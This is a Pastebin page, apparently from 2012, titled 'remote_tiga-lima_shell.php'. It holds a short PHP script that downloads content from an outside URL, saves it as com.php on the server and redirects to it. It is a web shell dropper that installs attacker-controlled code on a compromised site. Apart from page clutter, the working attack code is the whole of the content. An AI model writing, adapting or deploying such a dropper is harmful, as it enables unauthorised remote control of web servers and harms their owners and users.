Advertisement
anonopsbelgium

remote_tiga-lima_shell.php

Jan 31st, 2012
137
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.22 KB | None | 0 0
  1. remote_tiga-lima_shell.php
  2. <?php
  3. $namafile="com.php";
  4. $file = fopen($namafile ,'w+');
  5. $fa=file_get_contents('http://www.aliggroup.com/upload/log.txt');
  6. $write = fwrite ($file ,$fa);
  7. header ("location:com.php");
  8. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement